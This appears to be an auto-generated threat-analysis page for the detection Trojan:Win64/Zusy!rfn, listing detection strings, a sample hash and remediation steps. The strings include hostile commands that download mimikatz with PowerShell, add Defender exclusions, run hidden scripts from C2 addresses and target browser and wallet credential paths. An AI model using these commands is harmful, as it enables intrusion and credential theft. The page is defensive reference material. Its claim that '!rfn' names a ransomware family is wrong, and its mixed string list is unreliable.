user@threatcheck.sh ~ threat-analysis
bash
$ analyze-threat Trojan:Win64/Zusy!rfn
Trojan:Win64/Zusy!rfn - Windows Defender threat signature analysis

Trojan:Win64/Zusy!rfn - Windows Defender Threat Analysis

$ cat analysis.txt
=== THREAT ANALYSIS REPORT ===
Threat Name: Trojan:Win64/Zusy!rfn
Classification:
Type:Trojan
Platform:Win64
Family:Zusy
Detection Type:Concrete
Known malware family with identified signatures
Suffix:!rfn
Specific ransomware family name
Confidence:Very High
False-Positive Risk:Low

Concrete signature match: Trojan - Appears legitimate but performs malicious actions for 64-bit Windows platform, family Zusy

Summary:

This is a confirmed Trojan from the Zusy malware family that uses process hollowing to evade detection and injects itself into other processes. It drops multiple malicious DLLs for persistence and communicates with command-and-control (C2) servers to exfiltrate data or receive further instructions, indicating information-stealing capabilities.

Severity:
Critical
VDM Static Detection:
Relevant strings associated with this threat:
 - ftSK\ (PEHSTR_EXT)
 - Process hollowing complete (PEHSTR_EXT)
 - kqxcstfmcndwzigvhiotcmohs.dll (PEHSTR_EXT)
 - Control_RunDLL (PEHSTR_EXT)
 - Local\RustBacktraceMutex (PEHSTR_EXT)
 - Fsoiasgiosgiosagijsd (PEHSTR_EXT)
 - OIoijsg980segiosghj (PEHSTR_EXT)
 - ENDPOINTDLP.DLL (PEHSTR_EXT)
 - ping 192.168.3.2 -n 7 (PEHSTR_EXT)
 - c.tenor.com (PEHSTR_EXT)
 - troll-trollface.gif -o (PEHSTR_EXT)
 - 10.0.2.15:3000/hook.js (PEHSTR_EXT)
 - DnsHostnameToComputerNameW (PEHSTR_EXT)
 - FGBHNJMK.DLL (PEHSTR_EXT)
 - hiosjh98w4goiw4jserjh (PEHSTR_EXT)
 - fork5.dll (PEHSTR_EXT)
 - shibosjeg984gioserhjser (PEHSTR_EXT)
 - OjsjsofjAsjhgsrijhr (PEHSTR_EXT)
 - ASDFGH.DLL (PEHSTR_EXT)
 - MONIBUYVTY.DLL (PEHSTR_EXT)
 - TRCYTVUBI.DLL (PEHSTR_EXT)
 - DRCTF.DLL (PEHSTR_EXT)
 - fork8.dll (PEHSTR_EXT)
 - http://server.0569.microsoftmiddlename.tk (PEHSTR_EXT)
 - http://imgcache.cloudservicesdevc.tk (PEHSTR_EXT)
 - ProgramData/setting.ini (PEHSTR_EXT)
 - HipsTray.exe (PEHSTR_EXT)
 - vtrbytnuyki.dll (PEHSTR_EXT)
 - poofer_update.pdb (PEHSTR_EXT)
 - fork2.dll (PEHSTR_EXT)
 - Pasdogjseohejh (PEHSTR_EXT)
 - LshdgsikdjgoiQjsfohjf (PEHSTR_EXT)
 - .dll (PEHSTR_EXT)
 - c:\\Destro (PEHSTR_EXT)
 - INJECT_ENJOYERS.pdb (PEHSTR_EXT)
 - shample.ru (PEHSTR_EXT)
 - Shample.pdb (PEHSTR_EXT)
 - C:\TEMP\system.exe (PEHSTR_EXT)
 - C:\TEMP\SHAMple.dat (PEHSTR_EXT)
 - Software\SHAMple (PEHSTR_EXT)
 - Windows\CurrentVersion\Run (PEHSTR_EXT)
 - avtest\projects\RedTeam\c2implant\implant (PEHSTR_EXT)
 - yarttdn.de (PEHSTR_EXT)
 - C:\ProgramData\tnalpmi.exe (PEHSTR_EXT)
 - Exodus\exodus.wallet (PEHSTR_EXT)
 - Ethereum\keystore (PEHSTR_EXT)
 - Moonchild Productions\Pale Moon (PEHSTR_EXT)
 - Outlook\9375CFF0413111d3B88A00104B2A6676 (PEHSTR_EXT)
 - DLLExportViewer (PEHSTR_EXT)
 - Downloads\uhloader_[unknowncheats.me]_.dll (PEHSTR_EXT)
 - \Xor_Plus\Splash\Xor-hack.bmp (PEHSTR_EXT)
 - Data/Local/z.jpeg (PEHSTR_EXT)
 - /BanHwID/BanHwID.txt (PEHSTR_EXT)
 - GETSERVER2.0 (PEHSTR_EXT)
 - HsrjisrjAjsrihjr (PEHSTR_EXT)
 - OsjigjsrAjiejgiesj (PEHSTR_EXT)
 - BsohjirjAufiseighjseih (PEHSTR_EXT)
 - MshirAijseihjerh (PEHSTR_EXT)
 - OsojgeiherAijseijeh (PEHSTR_EXT)
 - KsoigjsAjshjrijh (PEHSTR_EXT)
 - Aogioswioghswoihjsrjh (PEHSTR_EXT)
 - KoiosdfhgiiIijshgisrjh (PEHSTR_EXT)
 - hjsgisegjoighjseihe (PEHSTR_EXT)
 - BsjiogsjgioAJIjsrgh (PEHSTR_EXT)
 - Kjsjoighsjrhgisrj (PEHSTR_EXT)
 - Jseiopsgopegiosjiohh (PEHSTR_EXT)
 - Bosdgiosigjsewihjseh (PEHSTR_EXT)
 - Vrheroigjw4oiughjser (PEHSTR_EXT)
 - cdn.discordapp.com/attachments/947450701154517052 (PEHSTR_EXT)
 - \yuki-module.dll (PEHSTR_EXT)
 - \dont_load.txt (PEHSTR_EXT)
 - \inject_version.txt (PEHSTR_EXT)
 - \lightcord-temp\extract.exe (PEHSTR_EXT)
 - .ropf (PEHSTR_EXT)
 - Project.Rummage.exe (PEHSTR_EXT)
 - @.ropf (PEHSTR_EXT)
 - \PostInstall\release\PostInstall.pdb (PEHSTR_EXT)
 - MRCorporation.exe (PEHSTR_EXT)
 - MRCorporation.Properties (PEHSTR_EXT)
 - MRCorporation.Properties.Resources.resources (PEHSTR_EXT)
 - MemberDefRidsAllocated.resources (PEHSTR_EXT)
 - tuiyumtynr.dll (PEHSTR_EXT)
 - odkrhnfld.dll (PEHSTR_EXT)
 - rgthryjt.dll (PEHSTR_EXT)
 - .themida (PEHSTR_EXT)
 - SteamService.exe (PEHSTR_EXT)
 - @.i815 (PEHSTR_EXT)
 - dmcommander.exe (PEHSTR_EXT)
 - naqspvwo.dll (PEHSTR_EXT)
 - datuorlp.dll (PEHSTR_EXT)
 - ComputeHash (PEHSTR_EXT)
 - CurrentVersion\Explorer\Advanced\Folder\Hidden\SHOWALL (PEHSTR_EXT)
 - \AutoRun.exe (PEHSTR_EXT)
 - E:\Projects\multiloader\bin\Release\inj.pdb (PEHSTR_EXT)
 - Setup=pdf.pdf (PEHSTR_EXT)
 - Setup=pdf.exe (PEHSTR_EXT)
 -          .exe (PEHSTR_EXT)
 - .exe (PEHSTR_EXT)
 -                                                                    .exe (PEHSTR_EXT)
 - DPApp.com (PEHSTR_EXT)
 - C:\Users\Public\dwwmm.txt (PEHSTR_EXT)
 - /m1.txt (PEHSTR_EXT)
 - lW)/%;. (PEHSTR)
 - kljszdfyrweon34v9345,oireu (PEHSTR_EXT)
 - wsdlq.com/wg/wlbb.txt (PEHSTR_EXT)
 - Software\xcy\ml (PEHSTR_EXT)
 - xieyilei2001.ys168.com (PEHSTR_EXT)
 - 51mole.com (PEHSTR_EXT)
 - mole.61.com (PEHSTR_EXT)
 - wg148.com/newgo.html0 (PEHSTR_EXT)
 - zy.anjian.com/soft/xjl/xjl.php (PEHSTR_EXT)
 - xunxunjp.com/1018jp.txt (PEHSTR_EXT)
 - taskkill /f /t /im iphoneqq.exe (PEHSTR_EXT)
 - iwofeng.com/tc.txt (PEHSTR_EXT)
 - cmd.exe /c net user hello123 hellxxx_Hxxx (PEHSTR_EXT)
 - JS% (SNID)
 - 112.175.69.77 pk555.com 777wt.com www.777wt.com 79.sf923.com sf777.com www.sf99.cc sf99.cc www.meishipai.com jdmzd.com (PEHSTR_EXT)
 - 67.198.179.75 www.22cq.com www.3000okhaosf.com hao119.haole56.com www.sf63.com 456ok.45195.com 79.sf923.com www.53uc.com 53uc.com www.recairen.com (PEHSTR_EXT)
 - Program Files\xcdlq (PEHSTR_EXT)
 - Windows\diskpt.dat (PEHSTR_EXT)
 - Yrnjfb^YZwsokgc_Y[xtplhd`Y\ (PEHSTR_EXT)
 - wallet.tenpay.com/cgi-bin/v1.0/queryqb.cgi (PEHSTR_EXT)
 - http://%s:%d/%s/%s (PEHSTR_EXT)
 - %s%.8x.bat (PEHSTR_EXT)
 - SOFTWARE\GTplus (PEHSTR_EXT)
 - %s M %s -r -o+ -ep1 "%s" "%s\*" (PEHSTR_EXT)
 - ShellExecuteA (PEHSTR_EXT)
 - voipcall.taobao (PEHSTR_EXT)
 - qsyou.com (PEHSTR_EXT)
 - Svdrd.exe (PEHSTR_EXT)
 - Svdrd.Resources.resources (PEHSTR_EXT)
 - 43.136.234.140:7890/Cloud150/SSDTHook_IO_Link.txt (PEHSTR_EXT)
 - AQAQAQ.txt (PEHSTR_EXT)
 - ktkt.txt (PEHSTR_EXT)
 - CMD /C SC DELETE (PEHSTR_EXT)
 - windows\cache\mgr.vbs (PEHSTR_EXT)
 - ftp.forest-fire.net (PEHSTR_EXT)
 - workspace\ (PEHSTR_EXT)
 - 0\bin\Release\ADBlockMasterTray.pdb (PEHSTR_EXT)
 - 12N\{ (SNID)
 - MelonSpoofer_b2.Properties.Resources (PEHSTR_EXT)
 - Mkwimscxva.Properties.Resources (PEHSTR_EXT)
 - WindowsFormsApp47.Properties.Resources.resources (PEHSTR_EXT)
 - Phadgood.MdivideWxflysx (PEHSTR_EXT)
 - togetherfowlappear5yearsthe3saying.o6 (PEHSTR_EXT)
 - heavenmeatbeholdyou.rejseed (PEHSTR_EXT)
 - bcalledthey.retmayflyIY0r (PEHSTR_EXT)
 - Discord DM : _encrypt3d. (PEHSTR_EXT)
 - \StarHighSrcFixV3\Blue loader\Blue loader (PEHSTR_EXT)
 - I Follow You.dll (PEHSTR_EXT)
 - WinExec (PEHSTR_EXT)
 - WinHttpReceiveResponse (PEHSTR_EXT)
 - D:\Desktop\TheDLL\x64\Release\TheDLL.pdb (PEHSTR_EXT)
 - EasyAntiCheat.sys (PEHSTR_EXT)
 - EacExploit.pdb (PEHSTR_EXT)
 - \Device\injdrv (PEHSTR_EXT)
 - \DosDevices\injdrv (PEHSTR_EXT)
 - \Driver\injdrv (PEHSTR_EXT)
 - Failed to open file for writing. (PEHSTR_EXT)
 - stormss.xyz/api (PEHSTR_EXT)
 - Hus Loader.pdb (PEHSTR_EXT)
 - dsc.gg/rive (PEHSTR_EXT)
 - start cmd /C (PEHSTR_EXT)
 - HiveNightmare.pdb (PEHSTR_EXT)
 - //vegax.gg/windows/ui_ver.php (PEHSTR_EXT)
 - VegaX\VegaX\obj\Release\Vega X.pdb (PEHSTR_EXT)
 - HKEY_CURRENT_USER\Software\VegaX (PEHSTR_EXT)
 - /Vega X;component/spawnablewindows/injectcode.xaml (PEHSTR_EXT)
 - autoexec\vegaxfpsunlocker.txt (PEHSTR_EXT)
 - DllCanUnloadNow (PEHSTR_EXT)
 - DllEntry (PEHSTR_EXT)
 - taskkill /f /im ProcessHacker.exe (PEHSTR_EXT)
 - taskkill /f /im FiddlerEverywhere.exe (PEHSTR_EXT)
 - taskkill /f /im OllyDbg.exe (PEHSTR_EXT)
 - taskkill /f /im Ida64.exe (PEHSTR_EXT)
 - \\.\kprocesshacker (PEHSTR_EXT)
 - cdn.discordapp.com/attachments (PEHSTR_EXT)
 - 79.174.92.22 (PEHSTR_EXT)
 - WVY3KZnpiFVzltHbFlr5U2Z30T2llQB1ZKkUGcJVQFxtNW2NL1R3ppZZhpWDSlJhDFF1cFaVxjWVkd3JaWYH7Xw== (PEHSTR_EXT)
 - VWhB9a0JQyMHY1DeWJT6eTR1NcBMueBy0EEFnYwLGD8koFT8ZAMzYTXLmwtkBBZ2EW3M/7JBU/GcjM2rEy4HZLQ== (PEHSTR_EXT)
 - NOSKILL RAFA.pdb (PEHSTR_EXT)
 - powershell.exe-Command (PEHSTR_EXT)
 - Clear-RecycleBin -Force -ErrorAction SilentlyContinueC:\Users\Public (PEHSTR_EXT)
 - C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartupUSERPROFILEFailed to get USERPROFILE (PEHSTR_EXT)
 - \AppData\Local\Google\Chrome\User Data\Default\Login Data (PEHSTR_EXT)
 - \AppData\Local\Google\Chrome\User Data\Local State (PEHSTR_EXT)
 - \AppData\Roaming\Microsoft\protects.zip (PEHSTR_EXT)
 - \AutoTorIP\obj\Debug\SecurSocks.pdb (PEHSTR_EXT)
 - powershell -NoProfile -ExecutionPolicy bypass -windowstyle hidden -Command (PEHSTR_EXT)
 - -NoProfile -windowstyle hidden -ExecutionPolicy bypass -Command  (PEHSTR_EXT)
 - NeekroAgain\Desktop\esp + aim meu ultimo\esp final testar coisas - Copia - Copia - Copia - Copia\Valorant-External-main\x64\Release (PEHSTR_EXT)
 - rasfdtyasdas.pdb (PEHSTR_EXT)
 - sdfgdfgfd.pdb (PEHSTR_EXT)
 - iasuidosdf.pdb (PEHSTR_EXT)
 - im MESTEResp final testar coisas - Copia - Copia - Copia - CopiaValorant - External - mainValorantOptimusPrinceps.ttf (PEHSTR_EXT)
 - retliften\secivreS\teSlortnoCtnerruC\METSYSs (PEHSTR_EXT)
 - stopify.co/news.php?tid=JBB69H.jpg (PEHSTR_EXT)
 - \AppData\Local\Temp\bin.exe (PEHSTR_EXT)
 - /tsoHbrKdetcirtseR (PEHSTR_EXT)
 - Pillager.dll (PEHSTR_EXT)
 - TripleDESCryptoServiceProvider (PEHSTR_EXT)
 - EncryptedLog.txt (PEHSTR_EXT)
 - KeyAndIV.txt (PEHSTR_EXT)
 - Seven.dll (PEHSTR_EXT)
 - v5.mrmpzjjhn3sgtq5w.pro (PEHSTR_EXT)
 - isapi/isapiv5.dll/v5 (PEHSTR_EXT)
 - pipe\vSDsGRFs62ghf (PEHSTR_EXT)
 - pipe\vsVSDDTGHGSy54 (PEHSTR_EXT)
 - CensoIBGE.RemoveCadastro.resources (PEHSTR_EXT)
 - del /s /f /q C:\Windows\Prefetch (PEHSTR_EXT)
 - deactivation.php?hash= (PEHSTR_EXT)
 - activation.php?code= (PEHSTR_EXT)
 - jmweczbxcvjsi (PEHSTR_EXT)
 - http://103.116.105.90/kyuc1/ (PEHSTR)
 - so2game_lite.exe (PEHSTR)
 - Tyrone.dll (PEHSTR_EXT)
 - set_UseShellExecute (PEHSTR_EXT)
 - Koi.Properties (PEHSTR_EXT)
 - settings\shop\type.txt (PEHSTR_EXT)
 - 04 - Downloads.lnk (PEHSTR_EXT)
 - Global\3pc6RWOgectGTFqCowxjeGy3XIGPtLwNrsr2zDctYD4hAU5pj4GW7rm8gHrHyTB6 (PEHSTR_EXT)
 - Software\Microsoft\Windows\CurrentVersion\Run (PEHSTR_EXT)
 - Execute (PEHSTR_EXT)
 - desktop.ini (PEHSTR_EXT)
 - FinalUncompressedSize (PEHSTR_EXT)
 - RtlGetCompressionWorkSpaceSize (PEHSTR_EXT)
 - System.Net (PEHSTR_EXT)
 - json:"iterator_slice" (PEHSTR_EXT)
 - main.DLLWMain (PEHSTR_EXT)
 - json:"client_id,omitempty (PEHSTR_EXT)
 - `.g.b.g.d.e.`.g.c.;.8. (PEHSTR_EXT)
 - $IM3YYFM.au3 (PEHSTR_EXT)
 - C:\$Recycle. (PEHSTR_EXT)
 - .ps1 (PEHSTR_EXT)
 - ps1 (PEHSTR_EXT)
 - ge.ps1 (PEHSTR_EXT)
 - \'cS@ (SNID)
 - System.Runtime (PEHSTR_EXT)
 - RuntimeCompatibilityAttribute (PEHSTR_EXT)
 - .ctor (PEHSTR_EXT)
 - .Security.Cryptography (PEHSTR_EXT)
 - riotclient://RiotClientServices.exe (PEHSTR_EXT)
 - server1.exe (PEHSTR_EXT)
 - server.Resources.resources (PEHSTR_EXT)
 - StealerDLL\x64\Release\STEALERDLL.pdb (PEHSTR_EXT)
 - Monero\wallets (PEHSTR_EXT)
 - Thunderbird\Profiles (PEHSTR_EXT)
 - \Users\Public\webdata\info.dat (PEHSTR_EXT)
 - WebSvc ... RegisterMachine w_sUUID (PEHSTR_EXT)
 - /C taskkill /IM %s /F (PEHSTR_EXT)
 - \Google\Chrome\Application\chrome.exe" --restore-last-session (PEHSTR_EXT)
 - dash.zintrack.com (PEHSTR_EXT)
 - You can kill a people, but you can't kill an idea. Resistance will continue until the final liberation of all Palestinian lands, and it is only a matter of time. (PEHSTR_EXT)
 - yahhelper.no-ip.org (PEHSTR_EXT)
 - IP=%s ComputerName=%s UserName=%s Attacked=%d/%d/%d (PEHSTR_EXT)
 - TheComputerOfTheGhost (PEHSTR_EXT)
 - System.Security.Cryptography (PEHSTR_EXT)
 - GetExecutingAssembly (PEHSTR_EXT)
 - \Stealler.pdb (PEHSTR_EXT)
 - DllImportAttribute (PEHSTR_EXT)
 - %userappdata%\RestartApp.exe (PEHSTR_EXT)
 - defOff.exe (PEHSTR_EXT)
 - GDI32.dll (PEHSTR_EXT)
 - 32.dll (PEHSTR_EXT)
 - 9.dll (PEHSTR_EXT)
 - System.IO (PEHSTR_EXT)
 - costura.costura.dll.compressed (PEHSTR_EXT)
 - TJprojMain.exe (PEHSTR_EXT)
 - %s:*:enabled:@shell32.dll,-1 (PEHSTR_EXT)
 - BaseOfDll (PEHSTR_EXT)
 - GET /livi.bin (PEHSTR_EXT)
 - \Data\Solutions\ (PEHSTR_EXT)
 - 0.pdb (PEHSTR_EXT)
 - WS2_32.dll (PEHSTR_EXT)
 - /new/net_api (PEHSTR_EXT)
 - powershell -Command  (PEHSTR_EXT)
 - GET / (PEHSTR_EXT)
 - 7N\efkidRdheeMgpx* (PEHSTR_EXT)
 - Software\Microsoft\Windows\CurrentVersion\Run\W32Time (PEHSTR_EXT)
 - libgcj_s.dll (PEHSTR_EXT)
 - .rsrc (PEHSTR_EXT)
 - Microsoft.VisualBasic.Application (PEHSTR_EXT)
 - System. (PEHSTR_EXT)
 - .text (PEHSTR_EXT)
 - .rdata (PEHSTR_EXT)
 - @.data (PEHSTR_EXT)
 - D.text (PEHSTR_EXT)
 - .idata   (PEHSTR_EXT)
 - .taggant (PEHSTR_EXT)
 - Zn(X\ck+O|jvTG}!mcU@a^ (PEHSTR_EXT)
 - <description>Inno Setup</description> (PEHSTR_EXT)
 - Fsignature.compressed (PEHSTR_EXT)
 - Fakilaharios.Resources (PEHSTR_EXT)
 - ExecutionPolicy Bypass (PEHSTR_EXT)
 - discord.gg (PEHSTR_EXT)
 - ExclusionLoader.pdb (PEHSTR_EXT)
 - pfx.strongname.compressed (PEHSTR_EXT)
 - pfx.stgname.compressed (PEHSTR_EXT)
 - crt.pfx.compressed (PEHSTR_EXT)
 - bbggtth.exe (PEHSTR_EXT)
 - XSPCnxO3J5eKgrbQ3R.7ljbNpdbPT7 (PEHSTR_EXT)
 - my_new_hook_project.dll (PEHSTR_EXT)
 - lognationprimecarraro.com/settings/config2.zip (PEHSTR_EXT)
 - infinitycheats\GameHelpersLoader__NEW\bin\Release\net8.0\win-x64\native\GameHelpersLoader__NEW.pdb (PEHSTR_EXT)
 - cmd /c powershell Invoke-WebRequest -Uri https://xspacet.wiki/stein/mimikatz.exe -Outfile C:\WinXRAR\mimikatz.exe (PEHSTR_EXT)
 - cmd /c powershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath "C:\WinXRAR (PEHSTR_EXT)
 - lderd\Release\lderd.pdb (PEHSTR_EXT)
 - BobuxManRemastered.exe (PEHSTR_EXT)
 - Software\Microsoft\Windows\CurrentVersion\Internet Settings (PEHSTR_EXT)
 - #Add-MpPreference -ExclusionPath C:\ (PEHSTR)
 - &$output = "$env:Temp/RuntimeBroker.exe (PEHSTR)
 - QStart-Process PowerShell -Verb RunAs "-NoProfile -ExecutionPolicy Bypass -Command (PEHSTR)
 - MGetCurrent()).IsInRole([Security.Principal.WindowsBuiltInRole]::Administrator (PEHSTR)
 - KTmV3LUl0ZW1Qcm9wZXJ0eSAtUGF0aCAiSEtDVTpcUkNXTVxyYyIgLU5hbWUgIiRhcmdzIg (PEHSTR_EXT)
 - `.rdata (PEHSTR_EXT)
 - URlMON.dLl (PEHSTR_EXT)
 - ,/<-w (PEHSTR_EXT)
 - X.text (PEHSTR_EXT)
 - .gfcd (PEHSTR_EXT)
 - cmd.exe /C timeout /T 1 /NOBREAK >nul (PEHSTR_EXT)
 - TuoniAgent.dll (PEHSTR_EXT)
 - BK: Succesfully deleted registry key: HKEY_LOCAL_MACHINE\%s - "%s (PEHSTR_EXT)
 - taskmgr.exe (PEHSTR_EXT)
 - msconfig.exe (PEHSTR_EXT)
 - shutdown.exe (PEHSTR_EXT)
 - taskkill.exe (PEHSTR_EXT)
 - payload.exe (PEHSTR_EXT)
 - a-zA-Z0-9+/ (PEHSTR_EXT)
 - AlarmPlus.Properties.Resources.resources (PEHSTR_EXT)
 - +iJuBfovHhKMKXZfVv7Tv8WYJ62/Nvgh3jDNr3UCSUZFE5lLlmSt4pL5+ZbUjcZ6TfUgnUQP92yh9qYAwk/LQQ== (PEHSTR_EXT)
 - Unlocker.exe (PEHSTR_EXT)
 - DownloaderApp.exe (PEHSTR_EXT)
 - iDTHNqCQGIVt0KFQUh9NyrHXKGQ7j/aa (PEHSTR_EXT)
 - api.telegram.org/bot (PEHSTR_EXT)
 - main.obfuscateCommand (PEHSTR_EXT)
 - iDTHNqCQGIVt0KFQUh9NyrHXKGQ7j/aaE/SNKAszEoyZwX6Vb7GJggL5/KBLM14rSMqsGxRA+ucLjSsANNLFeQ== (PEHSTR_EXT)
 - E:\VS2010\VC\include\ (PEHSTR_EXT)
 - -> CD/DVD (PEHSTR_EXT)
 - http://195.66.27.77:5554/ (PEHSTR_EXT)
 -  _bound_build.exe (PEHSTR_EXT)
 - http://91.108.241.80:5554/ (PEHSTR_EXT)
 - tjgajdjrg.exe (PEHSTR_EXT)
 - http (PEHSTR_EXT)
 -  .exe (PEHSTR_EXT)
 - 195.66.27.77 (PEHSTR_EXT)
 - 84.21.189.158 (PEHSTR_EXT)
 - nbgtpasrg.exe (PEHSTR_EXT)
 - crypted_build.exe (PEHSTR_EXT)
 - kan\Desktop\den444\den444\obj\Debug\den444.pdb (PEHSTR_EXT)
 - /auto.AutoModeChromeGather (PEHSTR_EXT)
 - %s.tar.gz (PEHSTR_EXT)
 - bits-project/bits/util (PEHSTR_EXT)
 - gather.tH (PEHSTR_EXT)
 - r.tar.gzH (PEHSTR_EXT)
 - Release\sessionuserhost (PEHSTR_EXT)
 - http://176.46.152.62:5858/ (PEHSTR_EXT)
 - *_build.exe (PEHSTR_EXT)
 - http://176.46.152.62:5858/dadaasads_new.ps1 (PEHSTR_EXT)
 - powershell.exe -ExecutionPolicy Bypass -WindowStyle Hidden -File (PEHSTR_EXT)
 - den444.exe (PEHSTR_EXT)
 - .?AV_ (PEHSTR_EXT)
 - Obak.dll ofyh (PEHSTR_EXT)
 - Exercicio05.Properties.Resources (PEHSTR_EXT)
 - wctEE5D.tmp (PEHSTR_EXT)
 - !#HSTR:StringCodeForMshta.A!pli (PEHSTR_EXT)
 - !#HSTR:StringCodeForHooking.C!pli (PEHSTR_EXT)
 - !#HSTR:StringCodeForHooking.D!pli (PEHSTR_EXT)
 - !#HSTR:StringCodeForHooking.L!pli (PEHSTR_EXT)
 - !#HSTR:StringCodeForHooking.O!pli (PEHSTR_EXT)
 - !#HSTR:StringCodeForRegsvr32.A!pli (PEHSTR_EXT)
 - !#HSTR:StringCodeForRundll32.A!pli (PEHSTR_EXT)
 - rundll32 (PEHSTR_EXT)
 - !#HSTR:StringCodeForBITSJobs.A!pli (PEHSTR_EXT)
 - !#HSTR:StringCodeForPowerShell.G!pli (PEHSTR_EXT)
 - !#HSTR:StringCodeForScheduledTask.A!pli (PEHSTR_EXT)
 - !#HSTR:StringCodeForDataEncoding.D!pli (PEHSTR_EXT)
 - !#HSTR:StringCodeForHooking.J!pli (PEHSTR_EXT)
 - !#HSTR:StringCodeForHooking.K!pli (PEHSTR_EXT)
 - !#HSTR:StringCodeForRemoteFileCopy.B!pli (PEHSTR_EXT)
 - !#HSTR:ExecutionGuardrails (PEHSTR_EXT)
 - !#HSTR:StringCodeForFileDeletion.A!pli (PEHSTR_EXT)
 - !#HSTR:StringCodeForHooking.M!pli (PEHSTR_EXT)
 - !#HSTR:StringCodeForNetshHelperDLL.A!pli (PEHSTR_EXT)
 - !#HSTR:StringCodeForRemoteServices.A!pli (PEHSTR_EXT)
Known malware which is associated with this threat:
Filename: 1ead277b73239b1e41be4c70c1bf9b850a9e99dcce938356b1a54b1f5ea1a61e
1ead277b73239b1e41be4c70c1bf9b850a9e99dcce938356b1a54b1f5ea1a61e
05/12/2025
VirusTotalDownload Sample
Remediation Steps:
Isolate the host from the network immediately. Perform a full antivirus scan to remove all malicious components. Since this is an information-stealing trojan, reset all passwords and credentials used on the compromised machine. Block the identified C2 domains and IPs at the firewall.
=== END REPORT ===
$ reanalyze-threat
This analysis was last updated on 05/12/2025. Do you want to analyze it again?
$ ls available-commands/
→ cd /home
user@threatcheck.sh:~$